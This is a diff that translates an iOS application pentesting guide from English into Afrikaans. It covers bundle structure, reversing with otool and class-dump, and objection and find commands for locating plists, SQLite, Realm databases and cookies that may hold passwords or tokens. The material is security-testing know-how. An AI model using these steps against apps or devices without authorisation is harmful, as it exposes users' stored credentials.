die **bundel-identifiseerder** van die geïnstalleerde toepassings te bepaal: ```bash $ frida-ps -Uai - PID Name Identifier +PID Name Identifier ---- ------------------- ----------------------------------------- 6847 Calendar com.apple.mobilecal 6815 Mail com.apple.mobilemail - - App Store com.apple.AppStore - - Apple Store com.apple.store.Jolly - - Calculator com.apple.calculator - - Camera com.apple.camera - - iGoat-Swift OWASP.iGoat-Swift +- App Store com.apple.AppStore +- Apple Store com.apple.store.Jolly +- Calculator com.apple.calculator +- Camera com.apple.camera +- iGoat-Swift OWASP.iGoat-Swift ``` +### Basiese Enumerasie & Hooking -### Basic Enumeration & Hooking - -Learn how to **enumerate the components of the application** and how to easily **hook methods and classes** with objection: +Leer hoe om die komponente van die toepassing te **enumerateer** en hoe om maklik **metodes en klasse te hook** met objection: {% content-ref url="ios-hooking-with-objection.md" %} [ios-hooking-with-objection.md](ios-hooking-with-objection.md) {% endcontent-ref %} -### IPA Structure +### IPA-Struktuur -The structure of an **IPA file** is essentially that of a **zipped package**. By renaming its extension to `.zip`, it can be **decompressed** to reveal its contents. Within this structure, a **Bundle** represents a fully packaged application ready for installation. Inside, you will find a directory named `.app`, which encapsulates the application's resources. +Die struktuur van 'n **IPA-lêer** is essensieel dié van 'n **gezippte pakkie**. Deur die uitbreiding te verander na `.zip`, kan dit **gedekomprimeer** word om sy inhoud te onthul. Binne hierdie struktuur verteenwoordig 'n **Bundel** 'n volledig verpakte toepassing gereed vir installasie. Binne-in sal jy 'n gids vind met die naam `.app`, wat die hulpbronne van die toepassing inkapsuleer. -* **`Info.plist`**: This file holds specific configuration details of the application. -* **`_CodeSignature/`**: This directory includes a plist file that contains a signature, ensuring the integrity of all files in the bundle. -* **`Assets.car`**: A compressed archive that stores asset files like icons. -* **`Frameworks/`**: This folder houses the application's native libraries, which may be in the form of `.dylib` or `.framework` files. -* **`PlugIns/`**: This may include extensions to the application, known as `.appex` files, although they are not always present. -* [**`Core Data`**](https://developer.apple.com/documentation/coredata): It is used to save your application’s permanent data for offline use, to cache temporary data, and to add undo functionality to your app on a single device. To sync data across multiple devices in a single iCloud account, Core Data automatically mirrors your schema to a CloudKit container. -* [**`PkgInfo`**](https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPRuntimeConfig/Articles/ConfigApplications.html): The `PkgInfo` file is an alternate way to specify the type and creator codes of your application or bundle. -* **en.lproj, fr.proj, Base.lproj**: Are the language packs that contains resources for those specific languages, and a default resource in case a language isn' t supported. -* **Security**: The `_CodeSignature/` directory plays a critical role in the app's security by verifying the integrity of all bundled files through digital signatures. -* **Asset Management**: The `Assets.car` file uses compression to efficiently manage graphical assets, crucial for optimizing application performance and reducing its overall size. -* **Frameworks and PlugIns**: These directories underscore the modularity of iOS applications, allowing developers to include reusable code libraries (`Frameworks/`) and extend app functionality (`PlugIns/`). -* **Localization**: The structure supports multiple languages, facilitating global application reach by including resources for specific language packs. +* **`Info.plist`**: Hierdie lêer bevat spesifieke konfigurasiebesonderhede van die toepassing. +* **`_CodeSignature/`**: Hierdie gids bevat 'n plist-lêer wat 'n handtekening bevat wat die integriteit van alle lêers in die bundel verseker. +* **`Assets.car`**: 'n Gekomprimeerde argief wat bateslêers soos ikone stoor. +* **`Frameworks/`**: Hierdie gids bevat die toepassing se inheemse biblioteke, wat in die vorm van `.dylib`- of `.framework`-lêers kan wees. +* **`PlugIns/`**: Dit kan uitbreidings van die toepassing insluit, bekend as `.appex`-lêers, alhoewel hulle nie altyd teenwoordig is nie. +* [**`Kerndata`**](https://developer.apple.com/documentation/coredata): Dit word gebruik om jou toepassing se permanente data vir aflyngebruik te stoor, tydelike data te kasheer en ongedaanmaakfunksionaliteit by jou app op 'n enkele toestel by te voeg. Om data oor meerdere toestelle in 'n enkele iCloud-rekening te sinchroniseer, spieël Kerndata outomaties jou skema na 'n CloudKit-houer. +* [**`PkgInfo`**](https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPRuntimeConfig/Articles/ConfigApplications.html): Die `PkgInfo`-lêer is 'n alternatiewe manier om die tipe en skepperkodes van jou toepassing of bundel te spesifiseer. +* **en.lproj, fr.proj, Base.lproj**: Dit is die taalpakkies wat hulpbronne vir daardie spesifieke tale bevat, en 'n verstekhulpbron in die geval dat 'n taal nie ondersteun word nie. +* **Sekuriteit**: Die `_CodeSignature/`-gids speel 'n kritieke rol in die veiligheid van die app deur die integriteit van alle gebundelde lêers deur digitale handtekeninge te verifieer. +* **Batebestuur**: Die `Assets.car`-lêer gebruik kompressie om grafiese bates doeltreffend te bestuur, wat noodsaaklik is vir die optimalisering van toepassingsprestasie en die vermindering van die algehele grootte daarvan. +* **Raamwerke en Inproppe**: Hierdie gidse beklemtoon die modulariteit van iOS-toepassings, wat ontwikkelaars in staat stel om herbruikbare kodelibras (`Frameworks/`) in te sluit en app-funksionaliteit uit te brei (`PlugIns/`). +* **Lokalisering**: Die struktuur ondersteun meertaligheid, wat globale toepassingsbereik fasiliteer deur hulpbronne vir spesifieke taalpakkies in te sluit. **Info.plist** -The **Info.plist** serves as a cornerstone for iOS applications, encapsulating key configuration data in the form of **key-value** pairs. This file is a requisite for not only applications but also for app extensions and frameworks bundled within. It's structured in either XML or a binary format and holds critical information ranging from app permissions to security configurations. For a detailed exploration of available keys, one can refer to the [**Apple Developer Documentation**](https://developer.apple.com/documentation/bundleresources/information_property_list?language=objc). +Die **Info.plist** dien as 'n hoeksteen vir iOS-toepassings, wat sleutelkonfigurasiedata inkapsuleer in die vorm van **sleutel-waarde** pare. Hierdie lêer is nie net 'n vereiste vir toepassings nie, maar ook vir app-uitbreidings en raamwerke wat daarmee saamgevoeg is. Dit is gestruktureer in XML of 'n binêre formaat en bevat kritieke inligting wat wissel van app-toestemmings tot sekuriteitskonfigurasies. Vir 'n gedetailleerde verkenning van beskikbare sleutels kan verwys word na die [**Apple Developer Documentation**](https://developer.apple.com/documentation/bundleresources/information_property_list?language=objc). -For those looking to work with this file in a more accessible format, the XML conversion can be achieved effortlessly through the use of `plutil` on macOS (available natively on versions 10.2 and later) or `plistutil` on Linux. The commands for conversion are as follows: +Vir diegene wat met hierdie lêer wil werk in 'n toegankliker formaat, kan die XML-omskakeling moeiteloos bereik word deur die gebruik van `plutil` op macOS (beskikbaar as 'n standaard op weergawes 10.2 en later) of `plistutil` op Linux. Die opdragte vir omskakeling is as volg: -- **For macOS**: +- **Vir macOS**: ```bash $ plutil -convert xml1 Info.plist ``` - -- **For Linux**: +- **Vir Linux**: ```bash $ apt install libplist-utils $ plistutil -i Info.plist -o Info_xml.plist ``` - -Among the myriad of information that the **Info.plist** file can divulge, notable entries include app permission strings (`UsageDescription`), custom URL schemes (`CFBundleURLTypes`), and configurations for App Transport Security (`NSAppTransportSecurity`). These entries, along with others like exported/imported custom document types (`UTExportedTypeDeclarations` / `UTImportedTypeDeclarations`), can be effortlessly located by inspecting the file or employing a simple `grep` command: - +Onder die menigte van inligting wat die **Info.plist** lêer kan onthul, sluit merkwaardige inskrywings in soos app-toestemmingsstrings (`UsageDescription`), aangepaste URL-skemas (`CFBundleURLTypes`), en konfigurasies vir App Transport Security (`NSAppTransportSecurity`). Hierdie inskrywings, tesame met ander soos uitgevoerde/ingevoerde aangepaste dokumenttipes (`UTExportedTypeDeclarations` / `UTImportedTypeDeclarations`), kan maklik opgespoor word deur die lêer te ondersoek of 'n eenvoudige `grep`-opdrag te gebruik: ```bash $ grep -i Info.plist ``` +**Data Paaie** -**Data Paths** - -In the iOS environment, directories are designated specifically for **system applications** and **user-installed applications**. System applications reside in the `/Applications` directory, while user-installed apps are placed under `/private/var/containers/`. These applications are assigned a unique identifier known as a **128-bit UUID**, making the task of manually locating an app's folder challenging due to the randomness of the directory names. - -To facilitate the discovery of a user-installed app's installation directory, the **objection tool** provides a useful command, `env`. This command reveals detailed directory information for the app in question. Below is an example of how to use this command: +In die iOS-omgewing word gidsies spesifiek aangewys vir **sisteemtoepassings** en **gebruiker-geïnstalleerde toepassings**. Sisteemtoepassings bly in die `/Applications` gids, terwyl gebruiker-geïnstalleerde toepassings onder `/private/var/containers/` geplaas word. Hierdie toepassings word toegewys aan 'n unieke identifiseerder wat bekend staan as 'n **128-bit UUID**, wat die taak van die handmatige vind van 'n toepassing se gidsie uitdagend maak as gevolg van die willekeurigheid van die gidsnaam. +Om die ontdekking van 'n gebruiker-geïnstalleerde toepassing se installasiegids te vergemaklik, bied die **objection tool** 'n nuttige bevel, `env`. Hierdie bevel onthul gedetailleerde gidsinligting vir die betrokke toepassing. Hieronder is 'n voorbeeld van hoe om hierdie bevel te gebruik: ```bash OWASP.iGoat-Swift on (iPhone: 11.1.2) [usb] # env @@ -228,61 +221,55 @@ CachesDirectory /var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8E DocumentDirectory /var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693/Documents LibraryDirectory /var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693/Library ``` - -Alternatively, the app name can be searched within the `/private/var/containers` using the `find` command: - +Alternatiewelik kan die app-naam binne die `/private/var/containers` gesoek word met behulp van die `find`-opdrag: ```bash find /private/var/containers -name "Progname*" ``` - -Commands such as `ps` and `lsof` can also be utilized to identify the app's process and list open files, respectively, providing insights into the application's active directory paths: - +Opdragte soos `ps` en `lsof` kan ook gebruik word om die proses van die app te identifiseer en oop lêers te lys, onderskeidelik, wat insig bied in die aktiewe gidspaaie van die toepassing: ```bash ps -ef | grep -i lsof -p | grep -i "/containers" | head -n 1 ``` - -**Bundle directory:** +**Bundelgids:** * **AppName.app** - * This is the Application Bundle as seen before in the IPA, it contains essential application data, static content as well as the application's compiled binary. - * This directory is visible to users, but **users can't write to it**. - * Content in this directory is **not backed up**. - * The contents of this folder are used to **validate the code signature**. +* Dit is die toepassingsbundel soos voorheen in die IPA gesien, dit bevat noodsaaklike toepassingsdata, statiese inhoud sowel as die toepassing se saamgestelde binêre lêer. +* Hierdie gids is sigbaar vir gebruikers, maar **gebruikers kan nie daarin skryf nie**. +* Inhoud in hierdie gids word **nie rugsteun gegee nie**. +* Die inhoud van hierdie gids word gebruik om die kodesignatuur te **valideer**. -**Data directory:** +**Datagids:** * **Documents/** - * Contains all the user-generated data. The application end user initiates the creation of this data. - * Visible to users and **users can write to it**. - * Content in this directory is **backed up**. - * The app can disable paths by setting `NSURLIsExcludedFromBackupKey`. +* Bevat alle gebruikers gegenereerde data. Die toepassing se eindgebruiker begin die skepping van hierdie data. +* Sigbaar vir gebruikers en **gebruikers kan daarin skryf**. +* Inhoud in hierdie gids word **rugsteun gegee**. +* Die toepassing kan paaie uitskakel deur `NSURLIsExcludedFromBackupKey` in te stel. * **Library/** - * Contains all **files that aren't user-specific**, such as **caches**, **preferences**, **cookies**, and property list (plist) configuration files. - * iOS apps usually use the `Application Support` and `Caches` subdirectories, but the app can create custom subdirectories. +* Bevat alle **lêers wat nie gebruikers-spesifiek is nie**, soos **geheue-opberging**, **voorkeure**, **koekies**, en eiendomslys (plist) konfigurasie lêers. +* iOS-toepassings gebruik gewoonlik die `Application Support` en `Caches` subgidse, maar die toepassing kan aangepaste subgidse skep. * **Library/Caches/** - * Contains **semi-persistent cached files.** - * Invisible to users and **users can't write to it**. - * Content in this directory is **not backed up**. - * The OS may delete this directory's files automatically when the app is not running and storage space is running low. +* Bevat **semi-blywende gegispte lêers**. +* Onsigbaar vir gebruikers en **gebruikers kan nie daarin skryf nie**. +* Inhoud in hierdie gids word **nie rugsteun gegee nie**. +* Die bedryfstelsel kan hierdie gids se lêers outomaties verwyder wanneer die toepassing nie loop nie en stoorruimte min is. * **Library/Application Support/** - * Contains **persistent** **files** necessary for running the app. - * **Invisible** **to** **users** and users can't write to it. - * Content in this directory is **backed** **up**. - * The app can disable paths by setting `NSURLIsExcludedFromBackupKey`. +* Bevat **blywende lêers** wat nodig is vir die uitvoering van die toepassing. +* **Onsigbaar** vir gebruikers en gebruikers kan nie daarin skryf nie. +* Inhoud in hierdie gids word **rugsteun gegee**. +* Die toepassing kan paaie uitskakel deur `NSURLIsExcludedFromBackupKey` in te stel. * **Library/Preferences/** - * Used for storing properties that can **persist even after an application is restarted**. - * Information is saved, unencrypted, inside the application sandbox in a plist file called \[BUNDLE\_ID].plist. - * All the key/value pairs stored using `NSUserDefaults` can be found in this file. +* Word gebruik om eienskappe te stoor wat **selfs na die herbegin van 'n toepassing volhou**. +* Inligting word onversleutel binne die toepassing se sandput in 'n plist-lêer genaamd \[BUNDLE\_ID].plist gestoor. +* Al die sleutel/waarde-pare wat met `NSUserDefaults` gestoor word, kan in hierdie lêer gevind word. * **tmp/** - * Use this directory to write **temporary files** that do not need to persist between app launches. - * Contains non-persistent cached files. - * **Invisible** to users. - * Content in this directory is not backed up. - * The OS may delete this directory's files automatically when the app is not running and storage space is running low. - -Let's take a closer look at iGoat-Swift's Application Bundle (.app) directory inside the Bundle directory (`/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app`): +* Gebruik hierdie gids om **tydelike lêers** te skryf wat nie tussen toepassingsbeginne volhou nie. +* Bevat nie-blywende gegispte lêers. +* **Onsigbaar** vir gebruikers. +* Inhoud in hierdie gids word nie rugsteun gegee nie. +* Die bedryfstelsel kan hierdie gids se lêers outomaties verwyder wanneer die toepassing nie loop nie en stoorruimte min is nie. +Kom ons kyk nou na iGoat-Swift se Toepassingsbundel (.app) gids binne die Bundelgids (`/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app`): ```bash OWASP.iGoat-Swift on (iPhone: 11.1.2) [usb] # ls NSFileType Perms NSFileProtection ... Name @@ -296,37 +283,31 @@ Regular 420 None ... LICENSE.txt Regular 420 None ... Sentinel.txt Regular 420 None ... README.txt ``` +### Binêre Omkeer -### Binary Reversing - -Inside the `.app` folder you will find a binary file called ``. This is the file that will be **executed**. You can perform a basic inspection of the binary with the tool **`otool`**: - +Binne die `.app`-map sal jy 'n binêre lêer kry genaamd ``. Dit is die lêer wat **uitgevoer** sal word. Jy kan 'n basiese inspeksie van die binêre lêer doen met die hulpmiddel **`otool`**: ```bash otool -Vh DVIA-v2 #Check some compilation attributes - magic cputype cpusubtype caps filetype ncmds sizeofcmds flags +magic cputype cpusubtype caps filetype ncmds sizeofcmds flags MH_MAGIC_64 ARM64 ALL 0x00 EXECUTE 65 7112 NOUNDEFS DYLDLINK TWOLEVEL WEAK_DEFINES BINDS_TO_WEAK PIE otool -L DVIA-v2 #Get third party libraries DVIA-v2: - /usr/lib/libc++.1.dylib (compatibility version 1.0.0, current version 400.9.1) - /usr/lib/libsqlite3.dylib (compatibility version 9.0.0, current version 274.6.0) - /usr/lib/libz.1.dylib (compatibility version 1.0.0, current version 1.2.11) - @rpath/Bolts.framework/Bolts (compatibility version 1.0.0, current version 1.0.0) +/usr/lib/libc++.1.dylib (compatibility version 1.0.0, current version 400.9.1) +/usr/lib/libsqlite3.dylib (compatibility version 9.0.0, current version 274.6.0) +/usr/lib/libz.1.dylib (compatibility version 1.0.0, current version 1.2.11) +@rpath/Bolts.framework/Bolts (compatibility version 1.0.0, current version 1.0.0) [...] ``` +**Kyk of die app versleutel is** -**Check if the app is encrypted** - -See if there is any output for: - +Kyk of daar enige uitset is vir: ```bash otool -l | grep -A 4 LC_ENCRYPTION_INFO ``` +**Ontleding van die binêre** -**Disassembling the binary** - -Disassemble the text section: - +Ontleed die teksafdeling: ```bash otool -tV DVIA-v2 DVIA-v2: @@ -340,25 +321,21 @@ DVIA-v2: 0000000100004acc adrp x10, 1098 ; 0x10044e000 0000000100004ad0 add x10, x10, #0x268 ``` - -To print the **Objective-C segment** of the sample application one can use: - +Om die **Objective-C-segment** van die voorbeeldtoepassing af te druk, kan 'n mens die volgende gebruik: ```bash otool -oV DVIA-v2 DVIA-v2: Contents of (__DATA,__objc_classlist) section 00000001003dd5b8 0x1004423d0 _OBJC_CLASS_$_DDLog - isa 0x1004423a8 _OBJC_METACLASS_$_DDLog - superclass 0x0 _OBJC_CLASS_$_NSObject - cache 0x0 __objc_empty_cache - vtable 0x0 - data 0x1003de748 - flags 0x80 - instanceStart 8 +isa 0x1004423a8 _OBJC_METACLASS_$_DDLog +superclass 0x0 _OBJC_CLASS_$_NSObject +cache 0x0 __objc_empty_cache +vtable 0x0 +data 0x1003de748 +flags 0x80 +instanceStart 8 ``` - -In order to obtain a more compact Objective-C code you can use [**class-dump**](http://stevenygard.com/projects/class-dump/): - +Om 'n meer kompakte Objective-C-kode te verkry, kan jy [**class-dump**](http://stevenygard.com/projects/class-dump/) gebruik: ```bash class-dump some-app // @@ -370,346 +347,327 @@ class-dump some-app #pragma mark Named Structures struct CGPoint { - double _field1; - double _field2; +double _field1; +double _field2; }; struct CGRect { - struct CGPoint _field1; - struct CGSize _field2; +struct CGPoint _field1; +struct CGSize _field2; }; struct CGSize { - double _field1; - double _field2; +double _field1; +double _field2; }; ``` - -However, the best options to disassemble the binary are: [**Hopper**](https://www.hopperapp.com/download.html?) and [**IDA**](https://www.hex-rays.com/products/ida/support/download\_freeware/). +Togtans, die beste opsies om die binêre lêer te ontbind is: [**Hopper**](https://www.hopperapp.com/download.html?) en [**IDA**](https://www.hex-rays.com/products/ida/support/download\_freeware/).
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik werkstrome te bou en outomatiseer met behulp van die wêreld se mees gevorderde gemeenskaplike gereedskap.\ +Kry Vandag Toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## Data Storage +## Data Berging -To learn about how iOS stores data in the device read this page: +Om te leer hoe iOS data in die toestel stoor, lees hierdie bladsy: {% content-ref url="ios-basics.md" %} [ios-basics.md](ios-basics.md) {% endcontent-ref %} {% hint style="warning" %} -The following places to store information should be checked **right after installing the application**, **after checking all the functionalities** of the application and even after **login out from one user and login into a different one**.\ -The goal is to find **unprotected sensitive information** of the application (passwords, tokens), of the current user and of previously logged users. +Die volgende plekke om inligting te stoor moet **direk na die installering van die toepassing** nagegaan word, **nadat al die funksies** van die toepassing nagegaan is, en selfs nadat **uitgelog is uit een gebruiker en ingelog is as 'n ander een**.\ +Die doel is om **ongebeskermd sensitiewe inligting** van die toepassing (wagwoorde, tokens), van die huidige gebruiker en van vorige aangemelde gebruikers te vind. {% endhint %} ### Plist -**plist** files are structured XML files that **contains key-value pairs**. It's a way to store persistent data, so sometimes you may find **sensitive information in these files**. It's recommended to check these files after installing the app and after using intensively it to see if new data is written. +**plist**-lêers is gestruktureerde XML-lêers wat **sleutel-waarde pare bevat**. Dit is 'n manier om volgehoue data te stoor, so soms kan jy **sensitiewe inligting in hierdie lêers vind**. Dit word aanbeveel om hierdie lêers na die installering van die app en na intensiewe gebruik daarvan te ondersoek om te sien of nuwe data geskryf word. -The most common way to persist data in plist files is through the usage of **NSUserDefaults**. This plist file is saved inside the app sandbox in **`Library/Preferences/.plist`** +Die mees algemene manier om data in plist-lêers vol te hou, is deur die gebruik van **NSUserDefaults**. Hierdie plist-lêer word binne die app-sandbox gestoor in **`Library/Preferences/.plist`** -The [`NSUserDefaults`](https://developer.apple.com/documentation/foundation/nsuserdefaults) class provides a programmatic interface for interacting with the default system. The default system allows an application to customize its behaviour according to **user preferences**. Data saved by `NSUserDefaults` can be viewed in the application bundle. This class stores **data** in a **plist** **file**, but it's meant to be used with small amounts of data. +Die [`NSUserDefaults`](https://developer.apple.com/documentation/foundation/nsuserdefaults) klas bied 'n programmatiese koppelvlak vir die interaksie met die verstekstelsel. Die verstekstelsel maak dit vir 'n toepassing moontlik om sy gedrag aan te pas volgens **gebruikersvoorkeure**. Data wat deur `NSUserDefaults` gestoor word, kan in die toepassingsbundel besigtig word. Hierdie klas stoor **data** in 'n **plist-lêer**, maar dit is bedoel om met klein hoeveelhede data gebruik te word. -This data cannot be longer accessed directly via a trusted computer, but can be accessed performing a **backup**. +Hierdie data kan nie direk via 'n betroubare rekenaar benader word nie, maar kan benader word deur 'n **back-up** uit te voer. -You can **dump** the information saved using **`NSUserDefaults`** using objection's `ios nsuserdefaults get` - -To find all the plist of used by the application you can access to `/private/var/mobile/Containers/Data/Application/{APPID}` and run: +Jy kan die gestoorde inligting **dump** deur **`NSUserDefaults`** te gebruik met behulp van objection se `ios nsuserdefaults get` +Om al die plist-lêers wat deur die toepassing gebruik word, te vind, kan jy toegang verkry tot `/private/var/mobile/Containers/Data/Application/{APPID}` en die volgende uitvoer: ```bash find ./ -name "*.plist" ``` +Om lêers vanaf **XML of binêre (bplist)** formaat na XML te omskep, is verskeie metodes beskikbaar, afhangende van jou bedryfstelsel: -To convert files from **XML or binary (bplist)** format to XML, various methods depending on your operating system are available: +**Vir macOS-gebruikers:** +Gebruik die `plutil` opdrag. Dit is 'n ingeboude hulpmiddel in macOS (10.2+), ontwerp vir hierdie doel: -**For macOS Users:** -Utilize the `plutil` command. It's a built-in tool in macOS (10.2+), designed for this purpose: +```bash +plutil -convert xml1 +``` +Hierdie opdrag sal die lêer omskep na XML-formaat en dit sal die oorspronklike lêer vervang met die nuwe XML-lêer. ```bash $ plutil -convert xml1 Info.plist ``` - -**For Linux Users:** -Install `libplist-utils` first, then use `plistutil` to convert your file: - +**Vir Linux-gebruikers:** +Installeer eers `libplist-utils` en gebruik dan `plistutil` om jouw lêer om te skakel: ```bash $ apt install libplist-utils $ plistutil -i Info.plist -o Info_xml.plist ``` - -**Within an Objection Session:** -For analyzing mobile applications, a specific command allows you to convert plist files directly: - +**Binne 'n Objection-sessie:** +Vir die analise van mobiele toepassings, stel 'n spesifieke bevel jou in staat om plist-lêers direk om te skakel: ```bash ios plist cat /private/var/mobile/Containers/Data/Application//Library/Preferences/com.some.package.app.plist ``` - ### Core Data -[`Core Data`](https://developer.apple.com/library/content/documentation/Cocoa/Conceptual/CoreData/nsfetchedresultscontroller.html#//apple\_ref/doc/uid/TP40001075-CH8-SW1) is a framework for managing the model layer of objects in your application. [Core Data can use SQLite as its persistent store](https://cocoacasts.com/what-is-the-difference-between-core-data-and-sqlite/), but the framework itself is not a database.\ -CoreData does not encrypt it's data by default. However, an additional encryption layer can be added to CoreData. See the [GitHub Repo](https://github.com/project-imas/encrypted-core-data) for more details. +[`Core Data`](https://developer.apple.com/library/content/documentation/Cocoa/Conceptual/CoreData/nsfetchedresultscontroller.html#//apple\_ref/doc/uid/TP40001075-CH8-SW1) is 'n raamwerk vir die bestuur van die model-laag van voorwerpe in jou aansoek. [Core Data kan SQLite gebruik as sy volhoubare stoor](https://cocoacasts.com/what-is-the-difference-between-core-data-and-sqlite/), maar die raamwerk self is nie 'n databasis nie.\ +CoreData enkripteer nie sy data standaard nie. 'n Bykomende enkripsie-laag kan egter by CoreData gevoeg word. Sien die [GitHub Repo](https://github.com/project-imas/encrypted-core-data) vir meer besonderhede. -You can find the SQLite Core Data information of an application in the path `/private/var/mobile/Containers/Data/Application/{APPID}/Library/Application Support` +Jy kan die SQLite Core Data-inligting van 'n aansoek vind in die pad `/private/var/mobile/Containers/Data/Application/{APPID}/Library/Application Support` -**If you can open the SQLite and access sensitive information, then you found a miss-configuration.** +**As jy die SQLite kan oopmaak en toegang tot sensitiewe inligting kan verkry, het jy 'n verkeerde konfigurasie gevind.** -{% code title="Code from iGoat" %} +{% code title="Kode van iGoat" %} ```objectivec -(void)storeDetails { - AppDelegate * appDelegate = (AppDelegate *)(UIApplication.sharedApplication.delegate); +AppDelegate * appDelegate = (AppDelegate *)(UIApplication.sharedApplication.delegate); - NSManagedObjectContext *context =[appDelegate managedObjectContext]; +NSManagedObjectContext *context =[appDelegate managedObjectContext]; - User *user = [self fetchUser]; - if (user) { - return; - } - user = [NSEntityDescription insertNewObjectForEntityForName:@"User" - inManagedObjectContext:context]; - user.email = CoreDataEmail; - user.password = CoreDataPassword; - NSError *error; - if (![context save:&error]) { - NSLog(@"Error in saving data: %@", [error localizedDescription]); +User *user = [self fetchUser]; +if (user) { +return; +} +user = [NSEntityDescription insertNewObjectForEntityForName:@"User" +inManagedObjectContext:context]; +user.email = CoreDataEmail; +user.password = CoreDataPassword; +NSError *error; +if (![context save:&error]) { +NSLog(@"Error in saving data: %@", [error localizedDescription]); - }else{ - NSLog(@"data stored in core data"); - } +}else{ +NSLog(@"data stored in core data"); +} } ``` {% endcode %} ### YapDatabase -[YapDatabase](https://github.com/yapstudios/YapDatabase) is a key/value store built on top of SQLite.\ -As the Yap databases are sqlite databases you can find them using the purposed commend in the previous section. +[YapDatabase](https://github.com/yapstudios/YapDatabase) is 'n sleutel/waarde-stoor wat gebou is op SQLite.\ +Aangesien die Yap-databasis sqlite-databasisse is, kan jy hulle vind deur die voorgestelde opdrag in die vorige afdeling te gebruik. -### Other SQLite Databases - -It's common for applications to create their own sqlite database. They may be **storing** **sensitive** **data** on them and leaving it unencrypted. Therefore, it's always interesting to check every database inside the applications directory. Therefore go to the application directory where the data is saved (`/private/var/mobile/Containers/Data/Application/{APPID}`) +### Ander SQLite-databasisse +Dit is algemeen vir programme om hul eie sqlite-databasis te skep. Hulle kan **sensitiewe** **data** daarop **berg** en dit onversleuteld agterlaat. Daarom is dit altyd interessant om elke databasis binne die toepassingsgids te ondersoek. Gaan dus na die toepassingsgids waar die data gestoor word (`/private/var/mobile/Containers/Data/Application/{APPID}`) ```bash find ./ -name "*.sqlite" -or -name "*.db" ``` +### Firebase Real-Time Databasis -### Firebase Real-Time Databases +Ontwikkelaars kan data stoor en sinchroniseer binne 'n NoSQL-wolk-gehoste databasis deur middel van Firebase Real-Time Databasisse. Die data word in JSON-formaat gestoor en word in werklike tyd gesinchroniseer na alle gekoppelde kliënte. -Developers are enabled to **store and sync data** within a **NoSQL cloud-hosted database** through Firebase Real-Time Databases. Stored in JSON format, the data gets synchronized to all connected clients in real time. - -You can find how to check for misconfigured Firebase databases here: +Jy kan hier vind hoe om vir verkeerd gekonfigureerde Firebase databasisse te kyk: {% content-ref url="../../network-services-pentesting/pentesting-web/buckets/firebase-database.md" %} [firebase-database.md](../../network-services-pentesting/pentesting-web/buckets/firebase-database.md) {% endcontent-ref %} -### Realm databases +### Realm databasisse -[Realm Objective-C](https://realm.io/docs/objc/latest/) and [Realm Swift](https://realm.io/docs/swift/latest/) offer a powerful alternative for data storage, not provided by Apple. By default, they **store data unencrypted**, with encryption available through specific configuration. - -The databases are located at: `/private/var/mobile/Containers/Data/Application/{APPID}`. To explore these files, one can utilize commands like: +[Realm Objective-C](https://realm.io/docs/objc/latest/) en [Realm Swift](https://realm.io/docs/swift/latest/) bied 'n kragtige alternatief vir data-opberging wat nie deur Apple voorsien word nie. Standaard stoor hulle data onversleutel, met versleuteling beskikbaar deur spesifieke konfigurasie. +Die databasisse is geleë by: `/private/var/mobile/Containers/Data/Application/{APPID}`. Om hierdie lêers te verken, kan mens opdragte soos die volgende gebruik: ```bash iPhone:/private/var/mobile/Containers/Data/Application/A079DF84-726C-4AEA-A194-805B97B3684A/Documents root# ls default.realm default.realm.lock default.realm.management/ default.realm.note| $ find ./ -name "*.realm*" ``` +Om hierdie databasislêers te sien, word die [**Realm Studio**](https://github.com/realm/realm-studio) hulpmiddel aanbeveel. -For viewing these database files, the [**Realm Studio**](https://github.com/realm/realm-studio) tool is recommended. - -To implement encryption within a Realm database, the following code snippet can be used: - +Om versleuteling binne 'n Realm-databasis te implementeer, kan die volgende kodefragment gebruik word: ```swift // Open the encrypted Realm file where getKey() is a method to obtain a key from the Keychain or a server let config = Realm.Configuration(encryptionKey: getKey()) do { - let realm = try Realm(configuration: config) - // Use the Realm as normal +let realm = try Realm(configuration: config) +// Use the Realm as normal } catch let error as NSError { - // If the encryption key is wrong, `error` will say that it's an invalid database - fatalError("Error opening realm: \(error)") +// If the encryption key is wrong, `error` will say that it's an invalid database +fatalError("Error opening realm: \(error)") } ``` +### Couchbase Lite Databasis -### Couchbase Lite Databases - -[Couchbase Lite](https://github.com/couchbase/couchbase-lite-ios) is described as a **lightweight** and **embedded** database engine that follows the **document-oriented** (NoSQL) approach. Designed to be native to **iOS** and **macOS**, it offers the capability to sync data seamlessly. - -To identify potential Couchbase databases on a device, the following directory should be inspected: +[Couchbase Lite](https://github.com/couchbase/couchbase-lite-ios) word beskryf as 'n **liggewig** en **ingebedde** databasis-enjin wat die **dokumentgeoriënteerde** (NoSQL) benadering volg. Dit is ontwerp om inheems te wees aan **iOS** en **macOS**, en bied die vermoë om data naadloos te sinchroniseer. +Om potensiële Couchbase-databasisse op 'n toestel te identifiseer, moet die volgende gids ondersoek word: ```bash ls /private/var/mobile/Containers/Data/Application/{APPID}/Library/Application Support/ ``` +### Koekies -### Cookies - -iOS store the cookies of the apps in the **`Library/Cookies/cookies.binarycookies`** inside each apps folder. However, developers sometimes decide to save them in the **keychain** as the mentioned **cookie file can be accessed in backups**. - -To inspect the cookies file you can use [**this python script**](https://github.com/mdegrazia/Safari-Binary-Cookie-Parser) or use objection's **`ios cookies get`.**\ -**You can also use objection to** convert these files to a JSON format and inspect the data. +iOS stoor die koekies van die programme in die **`Library/Cookies/cookies.binarycookies`** binne elke program se vouer. Ontwikkelaars besluit egter soms om hulle in die **sleutelketting** te stoor, aangesien die genoemde **koekie-lêer in rugsteun toeganklik is**. +Om die koekie-lêer te ondersoek, kan jy [**hierdie Python-skripsie**](https://github.com/mdegrazia/Safari-Binary-Cookie-Parser) gebruik of gebruik maak van objection se **`ios cookies 